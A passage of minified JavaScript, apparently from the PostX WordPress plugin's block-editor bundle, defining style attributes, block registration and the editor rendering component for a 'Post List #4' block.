}"}]},titleLength:{type:"string",default:0},titleBackground:{type:"string",default:"",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-title a { padding: 2px 7px; -webkit-box-decoration-break: clone; box-decoration-break: clone; background-color:{{titleBackground}}; }"}]},varticalAlign:{type:"string",default:"middle",style:[{depends:[{key:"varticalAlign",condition:"==",value:"top"}],selector:"{{ULTP}} .ultp-block-content-top .ultp-block-content { -ms-flex-item-align: flex-start;-ms-grid-row-align: flex-start;align-self: flex-start; }"},{depends:[{key:"varticalAlign",condition:"==",value:"middle"}],selector:"{{ULTP}} .ultp-block-content-middle .ultp-block-content { -ms-flex-item-align: center;-ms-grid-row-align: center;align-self: center; }"},{depends:[{key:"varticalAlign",condition:"==",value:"bottom"}],selector:"{{ULTP}} .ultp-block-content-bottom .ultp-block-content { -ms-flex-item-align: flex-end;-ms-grid-row-align: flex-end;align-self: flex-end; }"}]},imgFlip:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} .ultp-block-content-true .ultp-block-media, \n          {{ULTP}} .ultp-block-content-1 .ultp-block-media { flex-direction: row-reverse; }"}]},imgCrop:{type:"string",default:"full",depends:[{key:"showImage",condition:"==",value:!0}]},imgCropSmall:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_square",depends:[{key:"showImage",condition:"==",value:!0}]},imgWidth:{type:"object",default:{lg:"150",ulg:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { height:fit-content; }  \n          {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-image { max-width: {{imgWidth}}; }"}]},imgHeight:{type:"object",default:{lg:"",ulg:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { height:fit-content; }  \n          {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-image img { height: {{imgHeight}}; }"}]},imageScale:{type:"string",default:"cover",style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image img {object-fit: {{imageScale}};}"}]},imgAnimation:{type:"string",default:"opacity"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap { overflow:visible }  \n          {{ULTP}} .ultp-block-image"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-content-wrap { overflow:visible}  \n          {{ULTP}} .ultp-block-item:hover .ultp-block-image"}]},imgSpacing:{type:"object",default:{lg:"25"},style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"imgFlip",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-image { margin-right: {{imgSpacing}}px; }  \n          .rtl {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-image { margin-right: 0; margin-left: {{imgSpacing}}px; }"},{depends:[{key:"showImage",condition:"==",value:!0},{key:"imgFlip",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-image { margin-left: {{imgSpacing}}px; }  \n          .rtl {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-image { margin-left: 0; margin-right: {{imgSpacing}}px; }"}]},imgOverlay:{type:"boolean",default:!1},imgOverlayType:{type:"string",default:"default",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-items-wrap  .ultp-block-item:first-child .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSmallMeta:{type:"boolean",default:!0},metaListSmall:{type:"string",default:'["metaAuthor","metaDate","metaRead"]'},metaHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-all-postlist-2 span.ultp-block-meta-element:hover , \n          {{ULTP}} .ultp-block-items-wrap .ultp-all-postlist-2 span.ultp-block-meta-element:hover a { color: {{metaHoverColor}}; } \n          {{ULTP}} .ultp-all-postlist-2 span.ultp-block-meta-element:hover svg { color: {{metaHoverColor}}; }"}]},lgMetaHoverColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-first-postlist-2 span.ultp-block-meta-element:hover,  \n          {{ULTP}} .ultp-block-items-wrap .ultp-first-postlist-2 span.ultp-block-meta-element:hover a { color: {{lgMetaHoverColor}}; } \n          {{ULTP}} .ultp-first-postlist-2 span.ultp-block-meta-element:hover svg { color: {{lgMetaHoverColor}}; }"}]},showSmallCat:{type:"boolean",default:!1},showSeoMeta:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},showFullExcerptLg:{type:"boolean",default:!1},excerptLimitLg:{type:"string",default:40,style:[{depends:[{key:"showFullExcerptLg",condition:"==",value:!1}]}]},showSmallExcerpt:{type:"boolean",default:!0},excerptLimit:{type:"string",default:30,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1},{key:"showSmallExcerpt",condition:"==",value:!0}]}]},excerptColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n        {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:21,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n          {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:15,bottom:0,unit:"px"},xs:{top:5}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt { padding: {{excerptPadding}}; }"}]},showSmallBtn:{type:"boolean",default:!1},separatorShow:{type:"boolean",default:!0},septColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) { border-bottom-color:{{septColor}}; }"}]},septStyle:{type:"string",default:"dashed",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) { border-bottom-style:{{septStyle}}; }"}]},septSize:{type:"string",default:{lg:"1"},style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) { border-bottom-width: {{septSize}}px; }"}]},septSpace:{type:"object",default:{lg:"30"},style:[{selector:"{{ULTP}} .ultp-block-item:not(:first-child) { padding-bottom: {{septSpace}}px; }  \n          {{ULTP}} .ultp-block-item:not(:first-child) { margin-bottom: {{septSpace}}px; }"}]},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: flex-start; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: center; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: flex-end; } \n          .rtl {{ULTP}} .ultp-block-meta { justify-content: start; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:" .rtl {{ULTP}} .ultp-block-readmore a { display:flex; flex-direction:row-reverse; justify-content: flex-end; align-items:center; }"}]},overlayImgBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item:first-child .ultp-block-content { background-color:{{overlayImgBg}}; }"}]},contentWrapBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item:not(:first-child) .ultp-block-content-wrap, \n        {{ULTP}} .ultp-first-postlist-2 { background:{{contentWrapBg}}; }"}]},contentWrapHoverBg:{type:"string",style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover { background:{{contentWrapHoverBg}}; }"}]},contentWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap"}]},contentWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover"}]},contentWrapRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { border-radius: {{contentWrapRadius}}; }"}]},contentWrapHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover { border-radius: {{contentWrapHoverRadius}}; }"}]},contentWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap"}]},contentWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover"}]},lgContentPadding:{type:"object",default:{lg:{top:"24",bottom:"24",left:"24",right:"24",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-first-postlist-2  .ultp-block-content { padding: {{lgContentPadding}}; }"}]},contentWrapInnerPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content { padding: {{contentWrapInnerPadding}}; }"}]},contentWrapPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { padding: {{contentWrapPadding}}; } \n          {{ULTP}} .ultp-first-postlist-2 .ultp-block-content { margin: {{contentWrapPadding}}; }"}]},mobileImageTop:{type:"boolean",default:!1,style:[{selector:"@media (max-width: 768px) {  \n            {{ULTP}} .ultp-block-media .ultp-block-content-wrap { display: block;}\n          }"}]},headingText:{type:"string",default:"Post List #4"},counterTypo:{type:"object",default:{openTypography:1,size:{lg:18,unit:"px"},height:{lg:"30",unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""},style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:not(:first-child) .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before"}]},counterColor:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:not(:first-child) .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before { color:{{counterColor}}; }"}]},counterBgColor:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Contrast_2_color)"},style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:not(:first-child) .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before"}]},counterWidth:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:not(:first-child) .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before { width:{{counterWidth}}px; }"}]},counterHeight:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:not(:first-child) .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before { height:{{counterHeight}}px; }"}]},counterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Base_3_color)",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:not(:first-child) .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before"}]},counterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:not(:first-child) .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before { border-radius:{{counterRadius}}; }"}]},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { position: relative; display: block; margin: auto 0 0 0; height: auto;}"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; }\n          {{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a:hover,  \n          {{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; } \n          {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}}}"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover,  \n          {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active, \n          {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a,  \n          {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},paginationType:{type:"string",default:"pagination"},...(0,o.t)(["advFilter","heading","advanceAttr","pagination","video","meta","category","readMore","query"],["metaHoverColor"],[{key:"queryNumPosts",default:{lg:5}},{key:"queryNumber",default:5},{key:"pagiAlign",default:{lg:"left"}},{key:"vidIconPosition",default:"center"},{key:"metaSpacing",default:{lg:"10",unit:"px"}},{key:"metaMargin",default:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}}},{key:"metaPadding",default:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}}},{key:"metaSeparatorColor",default:"#b3b3b3"},{key:"catLineColor",default:"var(--postx_preset_Primary_color)"},{key:"catLineHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"catTypo",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""}},{key:"catColor",default:"var(--postx_preset_Primary_color)"},{key:"catBgColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_3_color)"}},{key:"catHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"catBgHoverColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_2_color)"}},{key:"catSacing",default:{lg:{top:0,bottom:10,left:0,right:0,unit:"px"}}},{key:"readMore",default:!0},{key:"readMoreIcon",default:" "},{key:"readMoreTypo",default:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"25",unit:"px"},spacing:{lg:"",unit:"px"},transform:"uppercase",weight:"500",decoration:"underline",family:""}},{key:"readMoreColor",default:"var(--postx_preset_Primary_color)"},{key:"readMoreBgColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_3_color)"}},{key:"readMoreHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"readMoreBgHoverColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_2_color)"}},{key:"readMoreSacing",default:{lg:{top:20,bottom:"",left:"",right:"",unit:"px"},xs:{top:15,unit:"px"}}}]),V4_1_0_CompCheck:a.O,...(0,i.b)({})}},1845:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(67594),n=l(73576),r=l(44371),s=l(66026);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-List-4/","block_docs"),p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-list-4.svg"}),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postlist4.svg"}},transforms:{to:[...(0,i.Z)("ultimate-post/post-list-3","listBlocks")]},usesContext:["post-grid-parent/postBlockClientId"],edit:n.Z,save:()=>null})},30077:(e,t,l)=>{"use strict";l.d(t,{Z:()=>B});var o=l(67294),a=l(53049),i=l(23890),n=l(49491),r=l(53105),s=l(29236),p=l(46896),c=l(71411),u=l(8152),d=l(76005),m=l(99838),g=l(31760),y=l(73151),b=l(69735),v=l(2963),h=l(39349),f=l(87025),k=l(76778);const{__}=wp.i18n,{InspectorControls:w,useBlockProps:x}=wp.blockEditor,{useEffect:T,useState:_,useRef:C,Fragment:E}=wp.element,{Spinner:S,Placeholder:P}=wp.components,{getBlockAttributes:L,getBlockRootClientId:I}=wp.data.select("core/block-editor");function B(e){const t=C(null),[l,B]=_(f.Ti),[U,M]=_(null),{setAttributes:A,name:H,className:N,attributes:j,context:Z,isSelected:O,clientId:R,attributes:{blockId:D,readMoreIcon:z,excerptLimit:F,showFullExcerpt:W,showSmallMeta:V,metaStyle:G,metaShow:q,catShow:$,metaSeparator:K,titleShow:J,catStyle:Y,catPosition:X,titlePosition:Q,excerptShow:ee,metaList:te,metaListSmall:le,showSmallCat:oe,readMore:ae,readMoreText:ie,showSmallBtn:ne,showSmallExcerpt:re,varticalAlign:se,columnFlip:pe,metaPosition:ce,layout:ue,customCatColor:de,onlyCatColor:me,contentTag:ge,titleTag:ye,showSeoMeta:be,titleLength:ve,metaMinText:he,metaAuthorPrefix:fe,titleStyle:ke,metaDateFormat:we,authorLink:xe,vidIconEnable:Te,notFoundMessage:_e,dcEnabled:Ce,dcFields:Ee,previewImg:Se,advanceId:Pe,headingShow:Le,filterShow:Ie,paginationShow:Be,paginationType:Ue,navPosition:Me,V4_1_0_CompCheck:{runComp:Ae},currentPostId:He}}=e;function Ne(e){B({...l,selectedDC:e})}function je(){B({...l,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function Ze(e){B({...l,section:{...f.ZQ,[e]:!0}}),(0,f.Rt)(e),(0,f.ob)(e),M("setting")}function Oe(e){B((t=>({...t,toolbarSettings:e}))),(0,f.os)(e)}function Re(){l.error&&B({...l,error:!1}),l.loading||B({...l,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(j)}).then((e=>{B({...l,postsList:e,loading:!1})})).catch((e=>{B({...l,loading:!1,error:!0})}))}T((()=>{(0,f.oA)(),Re()}),[]),T((()=>{const t=R.substr(0,6),l=L(I(R));(0,a.qi)(A,l,He,R),(0,y.h)(e),D?D&&D!=t&&(l?.hasOwnProperty("ref")||(0,a.k0)()||l?.hasOwnProperty("theme")||A({blockId:t})):(A({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&A({queryType:"archiveBuilder"}))}),[R]),T((()=>{const e=t.current;(0,b.o6)()&&0===j.dcFields.length&&A({dcFields:Array(k.PR).fill(void 0)}),e?((0,a.Qr)(e,j)&&(Re(),t.current=j),e.isSelected!==O&&O&&(0,f.gT)(Ze,Oe)):t.current=j}),[j]);const De={settingTab:U,setSettingTab:M,setAttributes:A,name:H,attributes:j,setSection:Ze,section:l.section,clientId:R,context:Z,setSelectedDc:Ne,selectedDC:l.selectedDC,selectParentMetaGroup:function(e){Ne(e),Oe("dc_group")}};let ze;if(D&&(ze=(0,m.Kh)(j,"ultimate-post/post-module-1",D,(0,a.k0)())),Se)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:Se});const Fe=x({...Pe&&{id:Pe},className:`ultp-block-${D} ${N}`,onClick:e=>{e.stopPropagation(),Ze("general"),Oe("")}});return(0,o.createElement)(E,null,(0,o.createElement)(k.FP,{store:De,selected:l.toolbarSettings}),(0,o.createElement)(w,null,(0,o.createElement)(k.ZP,{store:De})),(0,o.createElement)(g.Z,{include:[{type:"query"},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"grid_spacing",exclude:["columns","spaceSep","wrapOuterPadding","wrapMargin"]},{type:"layout",block:"post-module-1",key:"layout",options:[{img:"assets/img/layouts/pm1/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pm1/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pm1/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pm1/l4.png",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0},{img:"assets/img/layouts/pm1/l5.png",label:__("Layout 5","ultimate-post"),value:"layout5",pro:!0}]},{type:"feat_toggle",label:__("Grid Features","ultimate-post"),new:a.KE,[Ae?"exclude":"dep"]:a.N2}],store:De}),(0,o.createElement)("div",Fe,ze&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:ze}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(Le||Ie||Be)&&(0,o.createElement)(r.m,{attributes:j,setAttributes:A,onClick:()=>{Ze("heading"),Oe("heading")},setSection:Ze,setToolbarSettings:Oe}),function(){const e=`${ge}`,t=[],a=[],r=(e,t)=>(0,b.o6)()&&Ce&&(0,o.createElement)(h.Z,{idx:e,postId:t,fields:Ee,settingsOnClick:(e,t)=>{e?.stopPropagation(),Oe(t)},selectedDC:l.selectedDC,setSelectedDc:Ne,setAttributes:A,dcFields:Ee});return l.error?(0,o.createElement)(P,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):l.loading?(0,o.createElement)(P,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(S,null)):l.postsList.length>0?(0,o.createElement)("div",{className:`ultp-block-items-wrap ultp-block-post-module1 ultp-block-content-${se} ultp-block-content-${pe} ultp-${ue}`},l.postsList.map(((l,c)=>{const m=0==c?JSON.parse(te.replaceAll("u0022",'"')):JSON.parse(le.replaceAll("u0022",'"'));(0==c?t:a).push((0,o.createElement)(e,{key:c,className:`ultp-block-item post-id-${l.ID}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap"},0===c&&r(8,l.ID),(0,o.createElement)(s.y6,{attributes:j,post:l,idx:c,VideoContent:Te&&l.has_video?(0,o.createElement)(s.nk,{onClick:e=>{e.preventDefault(),Ze("video"),Oe("video")}}):null,CatCotent:0!==c&&!oe||"aboveTitle"==X?null:(0,o.createElement)("div",{className:"ultp-category-img-grid"},(0,o.createElement)(i.Z,{post:l,catShow:$,catStyle:Y,catPosition:X,customCatColor:de,onlyCatColor:me,onClick:e=>{Ze("taxonomy-/-category"),Oe("cat")}})),onClick:()=>{Ze("image"),Oe("image")}}),(0,o.createElement)("div",{className:"ultp-block-content"},0!==c&&r(8,l.ID),r(7,l.ID),"aboveTitle"==X&&(0===c||oe)&&(0,o.createElement)(i.Z,{post:l,catShow:$,catStyle:Y,catPosition:X,customCatColor:de,onlyCatColor:me,onClick:e=>{Ze("taxonomy-/-category"),Oe("cat")}}),r(6,l.ID),l.title&&J&&1==Q&&(0,o.createElement)(d.Z,{title:l.title,headingTag:ye,titleLength:ve,titleStyle:ke,onClick:e=>{Ze("title"),Oe("title")}}),r(5,l.ID),(0===c||V)&&q&&"top"==ce&&(0,o.createElement)(p.Z,{meta:m,post:l,metaSeparator:K,metaStyle:G,metaMinText:he,metaAuthorPrefix:fe,metaDateFormat:we,authorLink:xe,onClick:e=>{Ze("meta"),Oe("meta")}}),r(4,l.ID),l.title&&J&&0==Q&&(0,o.createElement)(d.Z,{title:l.title,headingTag:ye,titleLength:ve,titleStyle:ke,onClick:e=>{Ze("title"),Oe("title")}}),r(3,l.ID),(0===c||re)&&ee&&(0,o.createElement)(n.Z,{excerpt:l.excerpt,excerpt_full:l.excerpt_full,seo_meta:l.seo_meta,excerptLimit:F,showFullExcerpt:W,showSeoMeta:be,onClick:e=>{Ze("excerpt"),Oe("excerpt")}}),r(